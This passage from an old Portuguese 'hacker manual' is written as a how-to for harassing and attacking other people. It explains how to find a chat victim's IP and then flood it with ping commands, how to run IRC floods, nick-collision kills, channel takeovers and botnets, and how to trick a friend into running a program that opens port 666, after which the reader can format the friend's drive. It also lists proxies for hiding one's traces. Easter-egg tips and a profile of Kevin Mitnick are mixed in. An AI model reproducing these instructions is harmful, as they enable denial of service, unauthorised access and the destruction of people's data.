Encontre no seu micro, o atalho ou aviso do MS-DOS. Clique nele, deverá surgir uma tela preta com a seguinte aparência:C:\WINDOWS>Nele digite:ping www.provedoraquevocêquer. com.brFicando assim:C:\WINDOWS> PING www.provedoraquevocêquer.com.brSerá retomado o Host da provedora bbs e etc... Quem sabe depois você começa a brincar de TeInet?

2ª) Eu tenho o IP e não sei a provedora.

Digite no prompt do MS - DOS:tracert ipdocaraaquiFicando assim :C:\WINDOWS>TRACERT ipdocaraaquiSerá retornado o nome da provedora do cara, é só prestar atenção!!

3ª) Pegando IP em chat:

Feche todos os seus aplicativos de rede, ICQ, FTP, XITAMI..., que você estiver usando. Feche todos os navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que você quer pegar o ip. Peça as pessoas que estão conversando com você para pararem de te mandarem mensagens, quando isto acontecer mande algumas mensagens em sequência para vitima, você aprende isto na parte de chat desta HP. Alterne para o seu MS-DOS (ALT +TAB) , na hora e digite:arp -aFicando assim:C:\WINDOWS> arp -aNeste momento serão retomados, vários IP'S, ( 4 à 6 em média). O primeiro é o IP da sala aonde você se encontra. Entretanto, na "MAIORIA DAS VEZES" o segundo IP é do gafanhoto que você quer mandar para os sapos ! Se você não tem certeza e deseja confirmar isto, guarde o IP e compare com as informaçòes que você tem sobre a vítima (provedora porexemplo). Se você não sabe nada dela, paciência, pegue todos os IP's e nuke um à um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os IP'S que estão repetindo com mais frequência. E tome as medidas que desejar.

Page 36: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

IrcWar

Guerra BásicaEssa seção é dedicada àqueles que são novos na guerra em IRC. Esse texto vai lhes ensinar as bases do flood e colisão de nick, incluindo alguns tópicos que você verá adiante.

FlooDEssa é uma antiga, elegante e efetiva maneira de pegar quem você odeia. O que o flood faz com que a vítima mande muita informação para um servidor, que desconecta ela. Para tal são necessários clones. Clones são outras conexões com o servidor. Copias do seu IRC client. O flood script, manda os clones enviarem muita informação simultaneamente para a pessoa. Quando o IRC client dele tenta processar essa informação, manda muitos dados para o servidor, que desconecta ela. Existem muitos tipos de floods, escolher o certo é importante. Bons Flood são os DCC e CTCP. Os que não fazem nada são os Text, Notice e Invite floods. Bem como os Crap floods que não fazem nada mas fazem parecer. Outro fator importante é números de clones que você vai usar. Para dar flood em uma única pessoa, a melhor aposta que você pode fazer são 3 clones CTCP em floods como Clientinfo, Userinfo ou Version. ECHO floods são extremamente poderosos, porém requerem mais clones. DCC floods são muito efetivo s também. Existem 4 tipos de DCC flood diferentes. São eles: DCC Chat flood, que manda toneladas de janelas de DCC chat para a pessoa; DCC send flood, manda toneladas de DCC send (Se os DCCs forem aceitos automaticamente pode-se encher o HD do condenado de arquivos desagradáveis; DCC Resume e Accept são outros dois tipos. Esses últimos foram a melhor forma de flood encontrada, mas IRC clients não os suportam mais, tornando eles fúteis. Quando for usar clones ou fazer floods você deve ter cuidado para não ser pego. Isso acarretaria em um K-line. Para prevenir que isso aconteça, lembre: Não use clones se não for absolutamente necessário, por que arriscar? Destrua seus clones quando o objetivo for alcançado; Use "nick changing" clones pra dar flood. Todos sabem sobre o /whois para ver informações da pessoa, mas a maioria não sabe sobre o /whowas. Assim, se o clone mudar de nome depois do flood, a vítima nunca vai saber quem o fez. NUNCA dê floods em canais com IRCops ou Network admins! Isso, certamente, vai lhe custará um K-line. Se for possível, faça o flood junto de um amigo, quanto menos clones por IP menor a chance de você ser pego.

Colisão de nickA colisão de Nicks ocorre quando duas pessoas estão usando o mesmo nick. Como os servidores não podem suportar isso, as pessoas são desconectadas. Existem dois tipos de colisão de Nicks. A colisão por split server e a por lag. A por split server acontece quando você põe um bot dentro do splited server, com o nick da pessoa que você quer matar. No netmerge, as duas morrem. Esse método não funciona na undernet. O outro método é chamado de colisão por lag. Esse só pode ser feito quando a pessoa muda de nick. O que acontece é isso: 1. O Lamer muda de nick. 2. O script vê e manda um sinal para o bot que está no servidor laged e esse muda o seu nick para o novo nick da vítima. 3. Em uns poucos

Page 37: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

segundos de lag o servidor em que o bot está dá um kill na outra pessoa, porque acha que o seu bot pegou o nick primeiro. Essa não é um bom método para um takeover, mas é divertido ver um bando de gente recebendo kill num grande canal.

Tomando CanaisTomar canais é uma boa maneira de mostrar seu poder ou se vingar de um inimigo. É o motivo básico das guerras de IRC, controle de território. Essa seção contém informações úteis para fazer-lo de várias maneiras.1. Flood no Canal Esse método é divertido, mas a parte mais difícil é que cada vez mais pessoas estão ficando imunes ao flood. Conseguindo dar flood em todas as pessoas o resto é fácil. Pegue todos os clones que você usou e descarte-os. Depois entre no canal e pegue OP. Contudo se seu não cair temos um dilema. Um canal sem OP e com duas pessoas o querendo. O que você faz? Corra para um netsplit! 2. Netsplit Um canal sem OP é um alvo fácil para um netsplit. O que você faz é o seguinte: Quando achar um servidor splited conecte-se a ele. Se não houver ninguém no canal você ganha OP só entrando no canal. Com o OP, basta esperar por um netmerge e quando todos estiverem no canal novamente você vai ser o único OP, podendo fazer o que quiser! Fazer isso com um canal que já tem OPs não é fácil. Na Undernet é IMPOSSÍVEL. Mas isso não quer dizer que você não possa se divertir. Pegue o OP e espere um netmerge. Quando as pessoas voltarem ao canal, rode um desync. O que ele faz, é mudar as banlists, esvazie elas e mude os modos do canal. Isso realmente acaba com os servidores que já estão mal. Eles ficam tentando colocar o canal nos modos normais, isso causa um lag terrível que leva o canal à ruína. Isso acaba também com os bots que não estão splite d. Isso pode causa-los flood ou crash. Se você não pode hackear os OPs pelo menos tem a sua vingança. Essa brincadeira pode levar o canal a ficar mal por uma meia hora algumas vezes. Se você é sortudo o suficiente para estar numa rede lamer que ainda não tem proteção anti-nethack, você poderá tomar canais com netsplit, bastando ter o script certo. 1. Você precisa de um servidor splitado sem proteção. O que acontece é que quando o servidor quiser dar OP para alguém ele vai, na verdade, deOPar essa pessoa. 2. Outra boa maneira de fazer isso é tendo como dar um kickban em cada pessoa que entrar no canal por um netmerge. Isso combinado com o netsplit protection fará você tomar o canal dep ois de uma simples batalha. 3. Pedindo ao OP Essa é a maneira mais facil de tomar um canal. É efetiva e legal, significa eles te darem OP e você deOPar todos eles. Os IRCops não podem fazer nada contra isso. A melhor maneira de ganhar OP é ficar num canal um pouco, sendo amável e prestativo (essa é a parte difícil). Aí diga "Ei, você acha que pode me OPar? Sou confiavel. Eu tenho te ajudado desde que cheguei". Depois o script cuida de deOpar todos em massa, isso é fácil. O que o script vai fazer é óbvio: logo quando você ganhar o OP ele vai tirar o OP de todos os outros, com exceção de você. Eles nem vão ter tempo de reagir! Depois de estar sozinho como OP do canal você poderá fazer o que quiser, trancar o canal, kickar e/ou banir todo mundo, tudo que der na telha. O canal é seu agora!

Guerra Avançada

Page 38: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Os scripts de guerra estão ficando cada vez mais avançados. Contudo, os servidores e os IRCops também estão ficando cada vez melhores. Muitos servidores incorporam o Clone Detection. Isso significa listar as pessoas comparando os IP's e notificando os IRCops. Isso pode tornar impossível fazer um número de clones suficientes para dar um flood em alguém. Alguns servidores tem proteção contra táticas de netsplit takeover. Esse tipo de coisa pode deter o hacking contra OPs durante um netsplit, permitindo somente tomar canais que não tenham OP. Anti Collide é também usado em muitos servidores. Fazendo com que os dois usuários sejam mortos numa colisão por troca de nick. Se alguém quiser te ferrar você vai deixar de brigar só porque não pode usar clones e etc??? NÃO! 1. Nuke Nuke é uma grande arma para tirar alguém de IRC rápido! Funciona assim: O programa de nuke manda informação para pessoa no servidor e ela é ferrada por eles, causará erros como "dead Socket", "connection refused", "eof from client" e "machine is not on the network". Para usar o nuke é preciso primeiro um modem rápido, 28.8 ou melhor. Você também precisa do Trumpet© Winsock. Programa dial up que se comunica rapidamente com o modem. Esse programa pode ser facilmente encontrado na web. Agora só é preciso de um programa de Nuke. Eu recomendo o Winuke 4 by CHAOS INC. ou Wnewk para maquinas windows, ou se você usa um mac, MAC NUKE. Depois de pegar esses programas, é fácil ter uma vingança, tomar canais, e matar gente rapidamente. 2. Bombas ICMP ICMP é uma maneira extremamente poderosa de tirar a pessoa , não só de IRC, mas de sua conexão com a Internet. Funciona dessa maneira: ela manda mensagens ICMP, em uma taxa muito alta de velocidade, causando barulho na linha, e modem lag. Causa tanto lag, que seu ping aumenta terrivelmente e o joga pra fora do IRC server. Para usar o ICMP você precisa de um Unix Shell account. Por que? Porque para usar o ICMP efetivamente você precisa de mais do que um modem pode oferecer. Você precisa de uma T1, pelo menos. Existem muitos programas de ICMP para Windows disponíveis, mas eles não trabalham muito bem. É a velocidade que importa nessa hora. Aqui estão duas formas de usar ICMP num Unix shell: ping -s (ip address) (packet size) (# of packets) ping -s (packet size) -c (# of packets) <-f> (ip address) (IP address) é o *!*@seja.la.oque.for (packet size) é o tamanho de cada pacote a mandar, tente 30kb (# of packets) é quantos pacotes mandar 3000 é um bom número -f é opcional em segundo, e manda pacotes a 20/seg 3. Botnet/Floodnet É cada vez mais difícil usar clones sem ser pego. Você precisa de uma maneira de usar o flood sem ser detectado. Como fazer isso? Floodnet. Existem duas tipos diferentes de Floodnet. O primeiro é com Eggdrop bots, esses botnets são compreendidos como eggdrops ligados, e tem um script de flood comum. Existem botnets com muitas centenas de ligações. É muito difícil parar o flood deles. A outra maneira, é usar scripts individuais. Os scripts têm comandos comuns, e permitem que usuários com o mesmo script de se liguem, para juntos combinarem seus clones. Existem vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online porque estão em um Shell. Mas as desvantagens é que não são tão dinâmicos quanto um clone floodnet. se liguem, para juntos combinarem seus clones. Existem vantagens e desvantagens dos dois. As vantagens dos botnets é que estão sempre online porque estão em um Shell. Mas as desvantagens é que não são tão dinâmicos quanto um clone floodnet.

Page 39: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Kevin Mitnick

Se você acha que roubar 20.000 números de cartões de crédito e ficar na lista dos 10 criminosos mais procurados pelo FBI e muito veja mais o que ele fez.

Kevin David Mitnick nascido nos E.U.A., começou cedo, ele invadiu varios sistema de pequena empresa, depois invadiu o sistema da Defesa Aérea Norte América do Colorado com 17 anos em 1981.

Em 1989 agentes do FBI estavam reunindo provas de que Mitnick e um amigo Dicicco, havia roubado software secreto e 17 códigos de acesso de propriedade dos sistemas da rede.

Los Angeles condenou Mitnick sem condição de fiança, e disse que "quando ele está armado com um teclado, supõe-se uma ameaça para a comunidade".

O juiz sentenciou e fez ele assistir sessões de reabilitação, dizendo que ele era viciado no computador como se vicia nas drogas e proibiu o privilegiu telefonicos com medo que tivesse acesso ao um computador.

O detetive James K. Black chefe da unidade de crimes de informática do departamento de policia de Los Angeles disse que Mitnick estava vários níveis acima do que se poderia se definir um Hacker

Um ano depois, Mitnick foi posto em liberdade. Repetidamente, começaram a ocorrer coisas estranhas... O telefone do encarregado de sua libertade condicional foi repentinamente desconectado, sem que a companhia telefônica tivesse informado. O registro de crédito na TRW inc. de um juiz foi inexplicavelmente alterado e muitas outras coisas.

Mais uma vez Mitnick aprontou e o FBI estava a sua procura.

Em 1992, ele sumido do mapa.

Tsutomu Shimomura um dos maiores especialista de securança do mundo, ele tomava conta do Centro Nacional de Supercomputação em San Diego. Mitnick, o maior, invadiu seu sistema pessoal e a partir dele entrou no Centro de Supercomputação. A honra de Shimomura tinha caído no esgoto.

Shimomura desidiu encontrar Mitnick nem que fosse a unica coisa de sua vida. E colocou um micro que "vigiasse" o seu micro com a ajuda do FBI e da National Security Agency. E Kevin caiu mandou outra mensagem de voz dizendo "Ah Tsutomu, meu discípulo aprendiz, vejo que pois minha voz na Rede...Estou muito desgostoso..."Parecia que o intruso estava em Colorado.

Só com a ajuda dos técnicos da Sprint Cellular armados com monitores de freqüência celular, conseguiu scannear num edificio um sinal próximo do aeroporto

Page 40: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Mitnick rendeu-se pacificamente aos agentes do FBI.Seus computadores, software, livros, notas, e equipamento celular, foram tidos como evidência

Um dos motivo que Shimomura e sua ajudas não conseguião pegar ele é que Mitnick, grampeava os telefones celulares dos agentes do FBI responsáveis por ele.

Quando Shimomura y Mitnick se encontraram pela primera vez em uma sala do tribunal em Raleigh Carolina do Norte, Mitnick olhou Shimomura e disse "Olá Tsutomu, respeito tuas habilidades".

Page 41: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Nuke

1ª) Meu nuke não funciona

Tente o seguinte comando no prompt do MS-DOS:

ping -f-l1000 -t ipdocaraouping -t -11000 -f ipdocaraFicando assim:C:\WINDOWS>ping -f-11000 -t ipdocaraouC:\WINDOWS>ping -t -11000 -f ipdocaraRepita o procedimento ate ele cair. Lembre-se de que, quanto mais pessoas fazendo junto com você, mais rápido será o tombo :-)))

2ª) Partindo para o desespero:

Pegue um pense na parte de programas desta HP. Passe nas portas do micro do gafanhoto. Observe as que estão sem proteção e nuke! A maioria dos nukes vem designado as portas 137, 138, 139. Então mude e "meta os ferro" nas portas que estão sem proteçào.

3ª) Partindo para o desespero a beira de um ataque de nervos:

Passe o programa portscan nas portas do micro da vítima constantemente, ping o micro do cara como na lição 1 "inimigo" no mínimo vai ficar uma lerdeza hehehehe... Se você quiser arriscar, nuke ao mesmo tempo. Aviso: quem pode perder a conexão é você!

4ª) Não deu certo!!! :

Mude seu XT, com 4 megas de memória RAM e modem de 14.400 de conexão inferior a capacidade do mesmo para um micro decente e uma verdadeira provedora, e vai a m**** !

Page 42: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

OVOS DE PÁSCOA

Ovos de Páscoa são algumas supresas de escondidas em programasque ficam escondidas as vezes bem debaixo do nariz do usuário sem queeste perceba, eles não tem utilidade nenhuma aparente mas sãocapazes de mostrar o que os programadores de empresas conhecidas comoCorel, Microsoft, Netscape entre outras poderiam fazer às escondidasem nossas máquinas sem que percebessemos, um ovo de páscoa pode seracionado por um conjunto de teclas, um clique em determinado lugar dajanela, ou do modo que você menos imagina, vamos ver abaixo algunsdestes ovos de páscoa, com certeza você tem muitos joguinhos em suamáquina sem saber e irá ficar sabendo agora:

LOGOTIPO DANÇANTE E APRESENTAÇÃO NO INTERNET EXPLORER 4.0 :1.) Abra o Internet Explorer 4.0, clique no menu "Ajuda" e em seguidaclique em "Sobre o Internet Explorer"2.) Pressionando simultaneamente as teclas CTRL + SHIFT, clique no logo(letra 'E' azul) e arraste-a até o Globo, em seguida arraste-a até apalavra "Microsoft Internet Explorer 4.0", isto fará com que estáfigura se afaste aparecendo o botão destravar3.) Clique em destravar, e veja que o Globo começa a balançar4.) Novamente pressione CTRL SHIFT e arraste até o globo, isto faráo globo se abrir do tamanho da janela e abrirá uma nova janela com oscréditos dos programadores que fizeram o M$ IE4.0

EXCEL 95 - JOGO POLÊMICO NO ESTILO DOOM :Este jogo escondido no doom foi citado por algumas páginas quesugeriam Bill Gates como o 3º anti-Cristo citado na Bíblia, na minhaopinião um jogo inocente mas já ví páginas citarem esteinofensivo Ovo de Pascoa como "visão atemorizante" tsc. tsc. tsc.1.) Selecione a linha 95 (clique no botão 95 para selecionar toda alinha. Pressione TAB (assim só a célula B95 ficará selecionada)2.) Clique no menu "?" e em seguida clique em "Sobre o Microsoft Excel".3.) Pressionando simultaneamente CTRL SHIFT, clique em "Suporte aoProduto", isso iniciará o jogoIsto só funciona no Excel 95, no Excel do Office 97 não dá, o jogoé um pouco difícil mas não custa tentar, use as teclas 'D' paraolhar pra cima e 'C' pra olhar pra baixo, entre em "excelkfa" issofará uma parede desaparecer, não vou contar o que tem depois senãoperde a graça e você para de entrar na minha Home-Page.

BARRA DE ATALHOS DO OFFICE 95 :1.) Entre na barra de atalho do Office 95 e clique no ícone do cantoesquerdo2.) Clique em "Sobre o Microsoft Office"3.) Pressionando simultaneamente CTRL SHIFT clique no logotipo do

Page 43: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

programa.4.) Dê dois cliques em qualquer lugar da tela de inicialização doOffice.

ACCESS 95 :1.) No menu "Ferramentas" escolha a opção "Segurança", e depois"Contas de Usuário e grupo".2.) Clique na caixa "Novo" e no campo nome digite Pioneer e emidentificação digit a data de lançamento do Access 95 que é0925953.) Clique OK, para sair pressione ESC duas vezes.

WORD 95 :1.) Clique no menu "?" e em seguida clique em "Sobre o Microsoft Word".2.) Pressione simultaneamente as teclas CTRL SHIFT e clique na barrahorizontal acima do botão OK.

WORD 95/97 :1.) Crie um novo documento em branco e digite na primeira linha apalavra Blue.2.) Formate essa palavra na cor Azul e em negrito, em seguida adicioneum espaço ao final da palavra.3.) Clique no menu "?" (ou Ajuda no caso do Office 97) e depois cliqueem "Sobre o Microsoft Word".4.) Clique no logotipo do Word que fica no lado esquerdo (no word 97 énecessário estar pressionando as teclas CTRL SHIFT simultaneamente aoclicar no logo).Use a tecla 'Z' para mover o batedor esquerdo, e 'M' pra mover o batedordireito, tecla ESC para terminar.

POWER POINT 95/97 :1.) Clique no menu "?" ("Ajuda", no caso do Office 97) e escolha aopção, "Sobre o Microsoft PowerPoint".2.) Clique no ícone que fica no canto superior esquerdo.

POWER POINT 97 :1.) Clique no menu "Ajuda" e escolha a opção "Sobre o MicrosoftPowerPoint".2.) Pressione simultaneamente as teclas CTRL ALT SHIFT e clique 3 vezessobre a linha divisória horizontal.

WORD 97 :1.) Crie um documento em branco e digite a frase Unable to followdirections2.) Selecione a frase, clique no menu Ferramentas, em seguida clique emIdiomas, e esolha o Idioma Ingles(EUA)3.) Pressione simultaneamente as teclas SHIFT F7 para abrir o

Page 44: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

dicionário e veja o que o word sugere para substituição.

EXCEL 97 :1.) Abra o Excel e pressione F5, isto irá abrir uma janela, neladigite X97:L972.) Pressione TAB3.) Pressione siumltaneamente CTRL SHIFT e clique sobre o ícone deassitentes gráficos que fica na barra de ferramentas.4.) Use o mouse e as setas do teclado para jogar.

WINDOWS 95 :1.) Entre na ajuda do windows, (Iniciar/Ajuda), clique na guia'Localizar', se aparecer a tela 'Assistente de Configuração' cliqueem 'Avançar' e depois 'Concluir'2.) Clique na caixa opções, marque "Todas as palavras digitadas emqualquer ordem" e, no campo "Mostrar palavras que" marque "Contenham oscaracteres que você digitar", dê OK3.) No campo "Digite as palavras que deseja localizar" digite: Who knowswho built this tool?4.) Pressionando simultaneamente CTRL SHIFT clique sobre o botão'Limpar', na caixa Opções marque o botão "Pelo menos uma daspalavras digitadas" e no campo abaixo, selecione a opção "Contenhamos caracteres que você digitar". Clique na caixa Ok.5.) No campo "Digite as palavras que deseja localizar" digite: TheShadow knows!6.) Pressionando simultaneamente as teclas CTRL SHIFT, clique sobre acaixa limpar.

FREECELL - ESCOLHA ENTRE GANHAR OU PERDER :1.) Pressione simultaneamente as teclas CTRL SHIFT F102.) Escolha "Anular" para ganhar, "Repetir" para perder e "Ignorar" paracancelar.3.) Mova qualquer carta.

CAMPO MINADO - PARE O TEMPO :1.) Com o tempo correndo pressione ao mesmo tempo os dois botões domouse.2.) Isto irá apresentar um quadrado 3x3 será selecionado.3.) Mantenha os dois botões clicados e pressione a tecla ESC.4.) Pronto, a contagem do tempo está parada.

CAMPO MINADO - SOM AO PERDER :1.) Edite o arquivo Winmine.ini e adicione a linha Sound=10.2.) Isto fará um som tocar toda vez que voce perder.(Isso não é um Ovo de Páscoa mas vale a dica)

NETSCAPE :

Page 45: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

1.) Pressione Ctrl + Alt + S isto faz a barra de status aparecer oudesaparecer2.) Pressione Ctrl + Alt + F isto irá levar você até a página doFishCam, criada pelo inventor da função blink.3.) Pressione Ctrl + Alt + T isto irá mostrar a situação atual decomunicação com URLs e abertura de portas de comunicação.

SIMCITY 2000 :1.) Entre no SimCity e abra uma cidade qualquer2.) Digite priscilla e pronto: aparece um novo menu à direita dosdemais, chamado debug.

SIMCITY 2000 :1.) Em uma cidade qualquer, digite: 'imacheat', a cada vez que digitarvocê irá ganhar $ 500.0002.) Digite: 'gilmartin', base militar3.) Digite: 'noah' isso criará uma enchente.

CORELDRAW :1.) Entre no menu Help e clique sobre em 'About Corel' e escolha uma datelas abaixo.2.) Na 1ª Tela Dê um duplo clique em um dos ícones da tela About,ou na 2ª Tela pressionando simultaneamente Ctrl + Shift dê um duploclique em um dos dois ícones da tela 'About'3.) Basta ficar pressionando o botão esquerdo do mouse para que obalão suba, estará vendo um balão em um céu azul e se pressionaro botão direito do mouse verá o Elvis Presley caindo do alto domonitor.

WINDOWS :1.) Na área de trabalho, clique com o botão direito e, através domenu Novo, clique em Pasta.2.) No campo de nome da pasta, escreva sem as aspas: 'and now, themoment you've all been waiting for' e aperte ENTER.3.) Clique novamente com o botão direito e selecione Renomear. Escrevano nome da pasta: 'we proudly present for your viewing pleasure'.Pressione ENTER4.) Renomeie a pasta novamente com o texto: 'The Microsoft Windows 95Product Team!'.

OUTLOOK EXPRESS :1.) No Outlook Express, aperte no botão 'Redigir mensagem'2.) Clique no menu 'Formatar' e depois em 'Rich Text (HTML)', em seguidano corpo (dentro) da mensagem.3.) No menu de fontes, escreva athena e pressione Enter.4.) Feche a janela 'Nova mensagem', se o programa perguntar se vocêquer salvar a mensagem, clique em Não.

Page 46: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

5.) Na janela principal do Outlook Express, selecione o ícone doprograma que aparece logo acima da 'Caixa de Entrada', à esquerda.6.) Clique num espaço vazio do painel da direita entre os ícones'Ler Correio' e 'Ler Notícias', por exemplo.7.) Digite about (a palavra não aparecerá na tela), isto irámostrar os créditos da equipe

MIRC :1.) Entre no mIRC e clique em Help - About, (aquele ícone amarelo oúltimo da esquerda para a direita que faz aparecer a foto do autor).2.) Clique com o botão direito na foto do autor e digite as 'arnie', afoto do Khaled Mardam-Bey se tranformará na foto do seu bicho deestimação Arnie. Redigite as letras a r n i e para voltar ao normal.

1.) No mIRC dentro da opção Help - About, clique com o botãodireito do mouse sobre o ícone do mIRC no topo direito da janela. 2.)O ponto da letra i do nome mIRC fica animado.

1.) Clique com o botão direito do mouse em qualquer ícone da barrade ferramentas, a cada clique, você verá uma frase diferente.

1.) Também no menu Help - About, clique sbore o logo do mIRC, istoirá mostrar o antigo log do mIRC.

1.) Também no menu Help - About, clique com o botão direito no narizdo autor, e você ouvirá um som.

1.) Mantendo a tecla Shift pressionada clique no ícone About.

MS-DOS 6.22 :1.) Digite MSD (Microsoft System Diagnostic) e pressione ENTER.2.) Vá para o HELP e pressione ABOUT.3.) Pressione a tecla F1.

SHOCKWAVE :1.) Entre em um site que contenha uma apresentação utilizando oShockWave.2.) Vá empurrando o logotipo da MacroMedia até um dos cantos, demodo que seja possível clicar sobre ele.3.) Mova o mouse rapidamente sobre o logotipo e clique sobre ele, evocê verá os nomes da equipe de produção.

AUTO-CAD RELEASE 14 :1.) Mantendo pressionada as teclas CTRL+SHIFT vá para o Menu e cliqueem Help, 2.) Depois selecione About AutoCad.

CAKEWALK 6.0 :

Page 47: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

1.) Vá para o Menu e em Help clique em About.2.) Pressionando simultaneamente teclas CTRL+SHIFT clique sobre osímbolo do Cakewalk.3.) Tente e reorganize sua tela.

WINAMP 2.XX :1.) Digite: 'nullsoft slowly', pressione a tecla ESC para remover a telaOpen depois das letras L.3.) Vc tem de estar usando o skin . Você irá ver a mensagem: 'Itreally whips the lama's ass' - na Barra do Menu.4.) Digitando Nullsoft outras vezes a frase voltará a aparecer.

1.) Abra o Menu de opções e clique em Winamp.2.) Clique na aba de shareware.3.) Dê dois cliques rápidos sobre o texto: 'Usage Statistics'4.) Assim o texto mudará.

1.) Abra o Menu de opções e clique em Winamp.2.) Clique na aba de Winamp, se já não entrar nela.3.) Mantendo pressionadas as teclas Ctrl+Alt+Shift dê dois cliquesrápidos sobre a palavra: 'Copyright'5.) Aparecerá outra foto.

MACROMÉDIA DIRECTOR 6 :1.) Após entrar no Director vá para o Menu Help e clique em About.2.) Pressione o botão direito do mouse sobre a palavra 'Director' ou ologotipo da Macromedia e tente move-lo.3.) Os lootipos tomaram vida própria, ao mover um deles, os outros oseguirão.

MACROMÉDIA FREEHAND :1.) No menu 'Help' clique em 'About FreeHand' enquanto pressiona CTRL2.) Aparecerá a foto dos desenvolvedores, diferentes fotos paradiferentes versões.

HOT-DOG 4.5 :1.) No Menu Help e clique em 'About' 2.) Dê dois cliques sobre o logodo Hot Dog3.) Dê dois cliques sobre a foto de Brian.

QUARKXPRESS :1.) Em um novo documento ou em um já existente selecione algum textoda tela.2.) Mantendo pressionadas as teclas SHIFT+CTRL+K

QUICK TIME 32 :1.) Vá para o Painel de Controle e dê dois cliques rápidos sobre o

Page 48: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

ícone do "Quick Time 32".2.) Agora é só dar um clique com o botão esquerdo do mouse sobre aimagem do "Quick Time".3.) Clique com o botão direito do mouse outra vez na janela queaparece.

Page 49: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Porta 666

"Navegue" pelo HD de seu amigo com a facilidade de um comando DOS!

É muito fácil, você só precisa ter um amigo babaca que tenha um PC e um MODEM. Você vai precisar do programa Aabout (www.dolphinsys.com). O seu amigo também tem que tê-lo (Invente uma desculpa pra ele dizendo que o programa protege o computador). Procedimento:

Vocês dois tem que estar conectados (JURA ?!?!).Você deve pelo ICQ ou por chat contactar o seu amigo e também os dois tem que executar oprograma Aabout (reforçe a desculpa). Fique distraíndo-o um pouco pelo chat ou ICQ para ele não desconfiar.Entre no programa de telnet do windows (C:\windows\telnet.exe). Vá ao menu conectar-sistemaremoto. Vai aparecer uma tela para o login. Como host, coloque o IP dinâmicodo cara (tente achá-lo por ICQ, CHAT e cia.) e como porta, digite 666. Clique em conectar. No login, digite a palavra gr! (é GR com o ponto de exclamação, certo, é GR! e não GR)Agora apareceum PROMPT, no qual você tem controle total sobre o PC do cara. Use os comandos do DOS. Você pode digitar desde um inofensivo DIR até um "da hora" FORMAT C:\ hê! hê! hê!. Agora você pode zuar o AUTOEXEC.BAT do cara, colocar um vírus de macro no Word e muitas outras coisas que a sua IMAGINAÇÃO mandar!!! BOM DIVERTIMENTO!!!

Page 50: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Proxys

Lista de Proxy que você pode usar para "camuflar" suas conexõesEu não me responsabilizo pelo mal uso da informações aqui contidas. Se forem usadas para fins ilegais, toda responsabilidade será inteira mente sua.(seu lammer)

Segue abaixo a lista dos servidores proxys existentes pelo mundo. Alguns deles podem não funcionar, pois a GuI Hp's não se responsabiliza pelos servidores, são de inteira responsabilidade dos respectivos donos.

Sua conexão poderá diminuir dependendo pro proxy que você estives usando. Caso isso aconteça, troque de proxy. Caso aconteça de novo, troque novamente, até encontrar um proxy rápido.

Proxy Server Address Ports

sunsite.dsi.unimi.it 80wwwcache.doc.ic.ac.uk 3128proxy.telnetwork.it 8080proxy.skylink.it 8080proxy.alpcom.it 1080www.iprolink.ch 80193.45.68.17 80proxy.inet.it 808012.6.80.20 80129.25.3.13 80129.97.204.100 80130.102.42.225 80130.225.40.20 80130.230.102.19 80131.165.63.174 80131.252.62.186 80131.94.128.140 8080132.248.202.1 80132.250.196.3 9000133.34.12.11 8080134.91.90.28 80137.100.253.1 80137.229.160.50 80137.229.99.50 80138.25.8.1 80139.133.206.19 80140.140.58.1 80141.52.28.8 80141.62.1.5 80

Page 51: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

141.89.65.1 80142.165.5.142 80142.169.242.4 80142.30.230.10 80144.213.2.11 80145.24.129.252 8080147.160.216.10 80147.72.64.11 8080150.197.45.68 80151.201.61.7 80157.182.254.38 80159.83.127.101 80

Page 52: Manual Hacker -   Web viewClique no logotipo do Word que fica no ...   ... Operações dentro de parêntesis são sempre resolvidas primeiro independendo da ordem de

Regedit

Aqui algumas chaves BINÁRIAS para você não ter o trabalho de procurar...

Painel de Controle {21EC2020-3AEA-1069-A2DD-08002B30309D}

Impressoras {2227A280-3AEA-1069-A2DE-08002B30309D}

Lixeira {645FF040-5081-101B-9F08-00AA002F954E}

Meu Computador {20D04FE0-3AEA-1069-A2D8-08002B30309D}

Network Neighborhood {208D2C60-3AEA-1069-A2D7-08002B30309D}

Caixa de Entrada {00020D75-0000-0000-C000-000000000046}

Área de Trabalho {00021400-0000-0000-C000-000000000046}

Atalho {00021401-0000-0000-C000-000000000046}

TAREFA DO MENU INICIAR {DDB008FE-048D-11d1-B9CD-00C04FC2C1D2}

ACTIVE DESKTOP MOVER {72267F6A-A6F9-11D0-BC94-00C04FB67863}

